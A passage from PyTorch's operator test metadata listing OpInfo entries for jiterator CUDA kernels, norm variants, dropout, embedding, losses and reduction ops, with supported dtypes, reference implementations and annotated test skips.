not tuple DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), # https://github.com/pytorch/pytorch/issues/67458 DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # nonzero is not raising a warning when the out is resized DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out_warning'), # Can't find schemas for this operator for some reason DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), )), # Following tests are for jiterator's python interface # Jiterator can be used to author elementwise CUDA kernel # jiterator._create_jit_fn returns a callable that behaves like a regular pytorch op # See create_jit_fn in jiterator.py for more information UnaryUfuncInfo( 'jiterator_unary', op=torch.cuda.jiterator._create_jit_fn("template <typename T> T unary(T x) { return x * x + x; }"), ref=lambda x: x * x + x, dtypes=all_types_and_complex_and(torch.bfloat16, torch.float16, torch.bool), supports_out=False, supports_autograd=False, # jiterator ops doesn't have backward defined decorators=[ onlyCUDA, skipCUDAIfRocm, DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestUnaryUfuncs', 'test_reference_numerics_extremal'), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestUnaryUfuncs', 'test_reference_numerics_hard'), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestUnaryUfuncs', 'test_reference_numerics_normal'), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestUnaryUfuncs', 'test_reference_numerics_small'), ], skips=( # Jiterator ops doesn't support neg or conj view DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_view'), DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_conj_view'), DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_conj_view'), # Jiterator ops doesn't suport CompositeCompliantTensor # Following test should expectedFailure, but it's causing cascading failures in CUDA, thus skipped DecorateInfo(unittest.skip("skip"), 'TestCompositeCompliance', 'test_operator'), # Skip reference_numerics tests for bool type, as the defined function doesn't work for bool DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=[torch.bool]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_hard', dtypes=[torch.bool]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_normal', dtypes=[torch.bool]), # Expected failure: torch.jiterator_unary is not a valid op DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # Skip Nvfuser DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo'), ) ), BinaryUfuncInfo( 'jiterator_binary', op=torch.cuda.jiterator._create_jit_fn( "template <typename T> T binary(T x, T y, T alpha) { return x + alpha * y; }", alpha=1), ref=lambda input, other, *, alpha=1: np.add(input, other) if alpha == 1 \ else np.add(input, np.multiply(alpha, other)), dtypes=all_types_and_complex_and(torch.bfloat16, torch.float16, torch.bool), sample_inputs_func=partial(sample_inputs_jiterator, num_inputs=2, alpha=-3.14), supports_out=False, supports_autograd=False, # jiterator ops doesn't have backward defined supports_rhs_python_scalar=False, decorators=[onlyCUDA, skipCUDAIfRocm], skips=( # Jiterator ops doesn't support neg or conj view DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_view'), DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_conj_view'), DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_conj_view'), # Jiterator ops doesn't suport CompositeCompliantTensor # Following test should expectedFailure, but it's causing cascading failures in CUDA, thus skipped DecorateInfo(unittest.skip("skip"), 'TestCompositeCompliance', 'test_operator'), # Expected failure: torch.jiterator_binary is not a valid op DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # Skip Nvfuser DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo'), ) ), OpInfo( 'jiterator_4inputs_with_extra_args', op=torch.cuda.jiterator._create_jit_fn( "template <typename T> T binary(T i0, T i1, T i2, T i3, T alpha, T beta) { return alpha * i0 + beta * i1 + i2 + i3; }", alpha=1, beta=1), ref=lambda i0, i1, i2, i3, *, alpha=1, beta=1: alpha * i0 + beta * i1 + i2 + i3, dtypes=all_types_and_complex_and(torch.bfloat16, torch.float16, torch.bool), sample_inputs_func=partial(sample_inputs_jiterator, num_inputs=4, alpha=3.14, beta=-4.20), supports_out=False, supports_autograd=False, # jiterator ops doesn't have backward defined decorators=[onlyCUDA, skipCUDAIfRocm], skips=( # Jiterator ops doesn't support neg or conj view DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_view'), DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_conj_view'), DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_conj_view'), # Jiterator ops doesn't suport CompositeCompliantTensor # Following test should expectedFailure, but it's causing cascading failures in CUDA, thus skipped DecorateInfo(unittest.skip("skip"), 'TestCompositeCompliance', 'test_operator'), # Expected failure: torch.jiterator_4inputs_with_extra_args is not a valid op DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # Skip Nvfuser DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo'), ) ), BinaryUfuncInfo( 'jiterator_binary_return_by_ref', op=torch.cuda.jiterator._create_multi_output_jit_fn( """ template <typename T> T binary_return_by_ref(T i0, T i1, T& out0) { out0 = i0 + i1; } """, num_outputs=1), ref=lambda i0, i1: i0 + i1, dtypes=all_types_and_complex_and(torch.bfloat16, torch.float16, torch.bool), sample_inputs_func=partial(sample_inputs_jiterator, num_inputs=2, alpha=-0.42), supports_out=False, supports_autograd=False, # jiterator ops doesn't have backward defined supports_rhs_python_scalar=False, decorators=[onlyCUDA, skipCUDAIfRocm], skips=( # Jiterator ops doesn't support neg or conj view DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_view'), DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_conj_view'), DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_conj_view'), # Jiterator ops doesn't suport CompositeCompliantTensor # Following test should expectedFailure, but it's causing cascading failures in CUDA, thus skipped DecorateInfo(unittest.skip("skip"), 'TestCompositeCompliance', 'test_operator'), # Expected failure: torch.jiterator_4inputs_with_extra_args is not a valid op DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # Skip Nvfuser DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo'), ) ), OpInfo( 'jiterator_2inputs_2outputs', op=torch.cuda.jiterator._create_multi_output_jit_fn( """ template <typename T> T binary_2outputs(T i0, T i1, T& out0, T& out1) { out0 = i0 + i1; out1 = i0 - i1; } """, num_outputs=2), ref=lambda i0, i1, *, alpha=1: (i0 + i1, i0 - i1), dtypes=all_types_and_complex_and(torch.bfloat16, torch.float16, torch.bool), sample_inputs_func=partial(sample_inputs_jiterator, num_inputs=2), supports_out=False, supports_autograd=False, # jiterator ops doesn't have backward defined decorators=[onlyCUDA, skipCUDAIfRocm], skips=( # Jiterator ops doesn't support neg or conj view DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_view'), DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_conj_view'), DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_conj_view'), # Jiterator ops doesn't suport CompositeCompliantTensor # Following test should expectedFailure, but it's causing cascading failures in CUDA, thus skipped DecorateInfo(unittest.skip("skip"), 'TestCompositeCompliance', 'test_operator'), # Expected failure: torch.jiterator_4inputs_with_extra_args is not a valid op DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # Skip Nvfuser DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo'), ) ), # `torch.norm` has multiple code paths depending on the value of `p`. # These paths have different dtype support. Also JIT supports, # most variants but not all of them. So we split the OpInfo entries, # for `norm` based on the code-paths and JIT support. OpInfo( "norm", sample_inputs_func=sample_inputs_norm, dtypes=floating_and_complex_types_and(torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # AssertionError: RuntimeError not raised : Expected RuntimeError when doing an unsafe cast from a result # of dtype torch.float32 into an out= with dtype torch.long DecorateInfo( unittest.expectedFailure, "TestCommon", "test_out", device_type="meta", ), DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad', dtypes=[torch.complex128]), ), ), OpInfo('norm', variant_test_name='nuc', aten_name='nuclear_norm', sample_inputs_func=sample_inputs_norm_nuc, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack], check_batched_gradgrad=False, # torch.autograd.gradcheck.GradcheckError: While computing batched gradients # got: Could not allocate memory to change Tensor SizesAndStrides! check_batched_forward_grad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_and_complex_types(), dtypesIfCUDA=floating_and_complex_types(), skips=( # RuntimeError not raised : # Expected RuntimeError when calling with input.device=cpu and out.device=cuda DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), # RuntimeError: # Arguments for call are not valid. DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit', dtypes=(torch.complex64, torch.float32,)), # noqa: B950 ) ), OpInfo('norm', variant_test_name='fro', aten_name='frobenius_norm', sample_inputs_func=sample_inputs_norm_fro, dtypes=floating_and_complex_types_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, torch.bfloat16), supports_forward_ad=True, # torch.autograd.gradcheck.GradcheckError: While computing batched gradients # got: Could not allocate memory to change Tensor SizesAndStrides! check_batched_forward_grad=False, supports_fwgrad_bwgrad=True, skips=( # Pre-existing condition; Needs to be fixed DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_operator'), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_backward'), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad'), # Expected RuntimeError when calling with input.device=cpu and out.device=cuda DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), # Arguments for call are not valid. DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit', dtypes=(torch.complex64, torch.float32,)), # noqa: B950 )), OpInfo( "norm", variant_test_name="inf", sample_inputs_func=sample_inputs_norm_inf, dtypes=floating_and_complex_types_and(torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad', dtypes=[torch.complex128]), # AssertionError: RuntimeError not raised : Expected RuntimeError when doing an unsafe cast from a result # of dtype torch.float32 into an out= with dtype torch.long DecorateInfo( unittest.expectedFailure, "TestCommon", "test_out", device_type="meta", ), ), ), OpInfo('t', sample_inputs_func=sample_inputs_t, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # vmap does not support inplace views check_inplace_batched_forward_grad=False, autodiff_fusible_nodes=[], # aliases inputs, shouldn't be fused autodiff_nonfusible_nodes=[], # aliases inputs, shouldn't be fused dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), assert_autodiffed=True, error_inputs_func=error_inputs_t), UnaryUfuncInfo('special.erfcx', ref=scipy.special.erfcx if TEST_SCIPY else _NOTHING, aten_name='special_erfcx', decorators=(toleranceOverride({torch.float32: tol(atol=0, rtol=4e-6), }),), dtypes=all_types_and(torch.bool), supports_forward_ad=True, supports_fwgrad_bwgrad=True), OpInfo( "nn.functional.dropout", op=lambda input, *args, **kwargs: wrapper_set_seed(torch.nn.functional.dropout, input, *args, **kwargs), ref=_NOTHING, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # Probably because we have used lambda for the op here # AssertionError: JIT Test does not execute any logic DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # inplace variant dispatches to dropout kernel, while on CUDA # the op dispatches to _fused_dropout (with a few more conditions) # hence, different values and this skip here DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_neg_view', device_type='cuda'),), gradcheck_wrapper=wrapper_set_seed, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, supports_out=False, sample_inputs_func=sample_inputs_dropout, inplace_variant=lambda input, *args, **kwargs: wrapper_set_seed(torch.nn.functional.dropout, input, *args, **kwargs, inplace=True)), OpInfo( "nn.functional.dropout2d", op=lambda input, *args, **kwargs: wrapper_set_seed(torch.nn.functional.dropout2d, input, *args, **kwargs), ref=_NOTHING, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), skips=( # lambda impl DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # torch.autograd.gradcheck.GradcheckError: While computing batched gradients, got: # vmap: We do not yet support calling random operations inside of vmap. # Please perform random operations outside of vmap as a workaround DecorateInfo(unittest.expectedFailure, 'TestGradients', "test_forward_mode_AD"), DecorateInfo(unittest.expectedFailure, 'TestGradients', "test_inplace_forward_mode_AD"),), gradcheck_wrapper=wrapper_set_seed, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, # As per the docs, valid input dims are (3, 4) sample_inputs_func=partial(sample_inputs_dropout, valid_input_dim=(3, 4)), inplace_variant=lambda input, *args, **kwargs: wrapper_set_seed(torch.nn.functional.dropout2d, input, *args, **kwargs, inplace=True)), # In training mode, feature_alpha_dropout currently doesn't support inputs of complex dtype # unlike when `train=False`, it supports complex inputs, hence 2 OpInfos to cover all cases OpInfo( "nn.functional.feature_alpha_dropout", op=lambda input, *args, **kwargs: wrapper_set_seed(torch.nn.functional.feature_alpha_dropout, input, *args, **kwargs), variant_test_name="with_train", ref=_NOTHING, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), skips=( # lambda impl DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # torch.autograd.gradcheck.GradcheckError: While computing batched gradients, got: # vmap: We do not yet support calling random operations inside of vmap. # Please perform random operations outside of vmap as a workaround DecorateInfo(unittest.expectedFailure, 'TestGradients', "test_forward_mode_AD"), DecorateInfo(unittest.expectedFailure, 'TestGradients', "test_inplace_forward_mode_AD"),), gradcheck_wrapper=wrapper_set_seed, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, # As per the docs, valid input dims are (4, 5) sample_inputs_func=partial(sample_inputs_dropout, train=True, valid_input_dim=(4, 5)), inplace_variant=lambda input, *args, **kwargs: wrapper_set_seed(torch.nn.functional.feature_alpha_dropout, input, *args, **kwargs, inplace=True)), OpInfo( "nn.functional.feature_alpha_dropout", op=lambda input, *args, **kwargs: wrapper_set_seed(torch.nn.functional.feature_alpha_dropout, input, *args, **kwargs), variant_test_name="without_train", ref=_NOTHING, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), skips=( # lambda impl DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'),), gradcheck_wrapper=wrapper_set_seed, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, sample_inputs_func=partial(sample_inputs_dropout, train=False), inplace_variant=lambda input, *args, **kwargs: wrapper_set_seed(torch.nn.functional.feature_alpha_dropout, input, *args, **kwargs, inplace=True)), OpInfo( "nn.functional.one_hot", ref=reference_one_hot, supports_out=False, dtypes=_dispatch_dtypes((torch.int64,)), sample_inputs_func=sample_inputs_one_hot, ), OpInfo( "nn.functional.embedding", aten_backward_name="embedding_dense_backward", # We use lambda to reshuffle the positional arguments. # This is because currently only the `input` field of SampleInput # is tested in gradient tests. op=lambda weight, idx, **kwargs: torch.nn.functional.embedding(idx, weight, **kwargs), dtypes=floating_types_and(torch.bfloat16, torch.float16), sample_inputs_func=sample_inputs_embedding, error_inputs_func=error_inputs_embedding, supports_forward_ad=True, skips=( # lambda impl DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # Reference: https://github.com/pytorch/pytorch/issues/67084 DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_neg_view', device_type='cuda'), # Not a problem: embedding does weird stuff to its input (it renormalizes) DecorateInfo(unittest.skip('Allowed exemption'), 'TestCompositeCompliance', 'test_operator'), ), supports_expanded_weight=True, supports_out=False, ), OpInfo( "nn.functional.embedding_bag", # We use lambda to reshuffle the positional arguments. # This is because currently only the `input` field of SampleInput # is tested in gradient tests. op=lambda weight, idx, **kwargs: torch.nn.functional.embedding_bag(idx, weight, **kwargs), dtypes=floating_types_and(torch.float16), dtypesIfCUDA=floating_types_and(torch.bfloat16, torch.float16), # backward is not supported for mode `max` and dtype `bfloat16` backward_dtypesIfCUDA=floating_types_and(torch.float16), sample_inputs_func=sample_inputs_embedding_bag, skips=( # lambda impl DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # Not a problem: embedding_bag does weird stuff to its input (it renormalizes) DecorateInfo(unittest.skip('Allowed exemption'), 'TestCompositeCompliance', 'test_operator'), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_backward', device_type='cpu'), ), gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, supports_out=False, supports_gradgrad=False, ), UnaryUfuncInfo( "nn.functional.softplus", aten_backward_name='softplus_backward', ref=reference_softplus, sample_kwargs=lambda device, dtype, input: ({'beta': 3, 'threshold': .2}, {'beta': 3, 'threshold': .2}), sample_inputs_func=partial(sample_inputs_elementwise_unary, op_kwargs={'beta': 3, 'threshold': .2}), supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.bfloat16, torch.float16), decorators=( DecorateInfo( toleranceOverride ({ torch.half: tol(atol=1e-2, rtol=1e-2), torch.bfloat16: tol(atol=1e-2, rtol=1e-2), }), 'TestUnaryUfuncs'), ), ), OpInfo( "linalg.tensorinv", ref=np.linalg.tensorinv, dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_tensorinv, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=[skipCPUIfNoLapack, skipCUDAIfNoMagmaAndNoCusolver], ), OpInfo( "linalg.tensorsolve", ref=lambda a, b, dims=None: np.linalg.tensorsolve(a, b, axes=dims), dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_tensorsolve, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=[skipCPUIfNoLapack, skipCUDAIfNoMagma], ), OpInfo( "nn.functional.mse_loss", aten_backward_name='mse_loss_backward', ref=loss_reference_reduction_wrapper(lambda input, target: (input - target) ** 2), sample_inputs_func=sample_inputs_loss, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_types_and(torch.float16), backward_dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.bfloat16, torch.float16), backward_dtypesIfCUDA=floating_types_and(torch.bfloat16, torch.float16), skips=( # RuntimeError: input->type()->kind() == TypeKind::OptionalType # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":252, # please report a bug to PyTorch. DecorateInfo(unittest.expectedFailure, "TestJit", "test_variant_consistency_jit", dtypes=(torch.float32,),), ), ), OpInfo( "nn.functional.grid_sample", ref=_NOTHING, dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.float16), supports_out=False, sample_inputs_func=sample_inputs_grid_sample, supports_gradgrad=False, gradcheck_nondet_tol=1e-15), OpInfo( "argwhere", ref=np.argwhere, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_autograd=False, sample_inputs_func=sample_inputs_argwhere, ), ReductionOpInfo( 'all', identity=True, supports_multiple_dims=False, supports_autograd=False, result_dtype=torch.bool, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), ref=reference_reduction_numpy(np.all), skips=( # FIXME: does not support passing keepdim without dim DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_default_keepdim'), # FIXME: does not support dim=None DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_none'), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_none_keepdim'), # FIXME: uint8 input returns uint8 instead of bool DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_result_dtype', dtypes=[torch.uint8]), ), ), ReductionOpInfo( 'any', identity=False, supports_multiple_dims=False, supports_autograd=False, result_dtype=torch.bool, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), ref=reference_reduction_numpy(np.any), skips=( # FIXME: does not support passing keepdim without dim DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_default_keepdim'), # FIXME: does not support dim=None DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_none'), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_none_keepdim'), # FIXME: uint8 input returns uint8 instead of bool DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_result_dtype', dtypes=[torch.uint8]), ), ), ReductionOpInfo( 'amax', nan_policy='propagate', dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), ref=reference_reduction_numpy(np.amax), skips=( # FIXME: reduces all dimensions when dim=[] DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty_keepdim'), ), error_inputs_func=error_inputs_aminmax_amax_amin, ), ReductionOpInfo( 'amin', nan_policy='propagate', dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), ref=reference_reduction_numpy(np.amin), skips=( # FIXME: reduces all dimensions when dim=[] DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty_keepdim'), ), error_inputs_func=error_inputs_aminmax_amax_amin, ), ReductionOpInfo( 'argmax', supports_multiple_dims=False, supports_autograd=False, assert_jit_shape_analysis=True, result_dtype=torch.int64, dtypes=all_types_and(torch.float16, torch.bfloat16), ref=reference_reduction_numpy(np.argmax, supports_keepdims=False), skips=( # FIXME: keepdim parameter is ignored when dim=None DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_default_keepdim'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_none_keepdim'), ), ), ReductionOpInfo( 'argmin', supports_multiple_dims=False, supports_autograd=False, result_dtype=torch.int64, dtypes=all_types_and(torch.float16, torch.bfloat16), ref=reference_reduction_numpy(np.argmin, supports_keepdims=False), skips=( # FIXME: keepdim parameter is ignored when dim=None DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_default_keepdim'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_none_keepdim'), ), ), ReductionOpInfo( 'count_nonzero', identity=0, supports_out=False, supports_autograd=False, result_dtype=torch.int64, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_reduction_count_nonzero, ref=reference_reduction_numpy(np.count_nonzero), skips=( # FIXME: count_nonzero does not accept keepdim kwarg DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_default_keepdim'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_none_keepdim'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_single_keepdim'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty_keepdim'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_multi_keepdim'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_multi_unsorted_keepdim'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_offbounds_keepdim'), # FIXME: dim=[] reduces all dimensions DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty'), ), ), ReductionOpInfo( 'mean', nan_policy='propagate', supports_forward_ad=True, supports_fwgrad_bwgrad=True, # FIXME: mean needs 'dim' parameter when using the 'out' overload. # Adding it with 'generate_args_kwargs' does not work, since these also get passed # onto the reference implementations. supports_out=False, assert_autodiffed=True, assert_jit_shape_analysis=True, promotes_int_to_float=True, dtypes=floating_and_complex_types_and(torch.float16, torch.bfloat16), ref=reference_reduction_numpy(np.mean), error_inputs_func=error_inputs_mean, skips=( # FIXME: mean does not support passing keepdim without passing dim DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_default_keepdim'), # FIXME: mean reduces all dimensions when dim=[] DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty_keepdim'), # FIXME: mean does not support passing None to dim DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_none'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_none_keepdim'), # FIXME: improve precision DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_small_input', dtypes=[torch.float16]), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_extremal_values', device_type='cuda', dtypes=[torch.complex64]), ), ), ReductionOpInfo( 'nanmean', nan_policy='omit', assert_autodiffed=True, promotes_int_to_float=True, dtypes=floating_types_and(torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_nan_reduction(supports_multiple_dims=True), ref=reference_reduction_numpy(np.nanmean), skips=( # AssertionError: False is not true : # Failure in testing nodes' autodifferentiation. DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), # FIXME: prod reduces all dimensions when dim=[] DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty_keepdim'), # FIXME: improve precision DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_small_input', dtypes=[torch.float16]), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_duplicate_values', device_type='cuda', dtypes=[torch.float16]), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_extremal_values', device_type='cuda', dtypes=[torch.complex64]), ), ), ReductionOpInfo( 'std', nan_policy='propagate', supports_out=False, complex_to_real=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=True, promotes_int_to_float=True, dtypes=floating_and_complex_types_and(torch.half, torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_std_var, ref=reference_std_var(np.std), generate_args_kwargs=generate_std_var_kwargs, skips=( # FIXME: cannot specify keepdim without dim DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_default_keepdim'), # FIXME: dim=None not supported DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_none'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_none_keepdim'), # FIXME: dim=[] reduces all dimensions DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty_keepdim'), # FIXME: improve precision DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_small_input'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_duplicate_values'), # NumPy is giving NaN for this DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_large_input'), ), ), ReductionOpInfo( 'var', nan_policy='propagate', supports_out=False, assert_autodiffed=True, promotes_int_to_float=True, complex_to_real=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_and_complex_types_and(torch.half, torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_std_var, ref=reference_std_var(np.var), generate_args_kwargs=generate_std_var_kwargs, skips=( # FIXME: cannot specify keepdim without dim DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_default_keepdim'), # FIXME: dim=None not supported DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_none'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_none_keepdim'), # FIXME: dim=[] reduces all dimensions DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty_keepdim'), # FIXME: improve precision DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_small_input'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_duplicate_values'), # NumPy is giving NaN for this DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_large_input'), ), ), ReductionOpInfo( 'prod', identity=1, nan_policy='propagate', supports_multiple_dims=False, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, 